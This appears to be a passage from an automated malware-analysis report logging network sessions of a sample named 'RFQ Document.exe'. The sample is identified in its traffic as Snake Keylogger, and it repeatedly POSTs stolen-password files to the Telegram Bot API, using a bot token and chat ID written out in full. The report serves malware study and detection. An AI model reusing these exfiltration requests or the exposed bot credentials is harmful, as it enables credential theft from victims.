                                            Data Ascii: {"ok":true,"result":{"message_id":12724,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808740,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            138192.168.2.449937149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:01 UTC220OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d9edf9e7
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:01 UTC221OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 39 65 64 66 39 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d9edf9e7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:01 UTC221INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:01 UTC221INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12725,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            139192.168.2.449938149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:01 UTC222OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255da0a972b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:01 UTC222OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 30 61 39 37 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255da0a972bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:01 UTC223INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:01 UTC223INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12726,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            14192.168.2.449788149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:23 UTC22OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c383480a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:23 UTC22OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 38 33 34 38 30 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c383480aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:23 UTC22INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:23 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:23 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12593,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            140192.168.2.449939149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:01 UTC223OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255da226dbb
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:01 UTC224OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 32 32 36 64 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255da226dbbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:01 UTC224INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:01 UTC224INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12727,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            141192.168.2.449940149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:01 UTC225OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255da416c4b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:01 UTC225OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 34 31 36 63 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255da416c4bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:01 UTC226INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:01 UTC226INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12728,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            142192.168.2.449941149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:01 UTC227OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255da56e2bf
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:01 UTC227OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 35 36 65 32 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255da56e2bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:01 UTC227INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:01 UTC228INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12729,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            143192.168.2.449942149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:02 UTC228OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255da7d07f1
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:02 UTC229OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 37 64 30 37 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255da7d07f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:02 UTC229INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:02 UTC229INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12730,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            144192.168.2.449943149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:02 UTC230OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255da94deb0
                                            Host: api.telegram.org
                                            Content-Length: 407
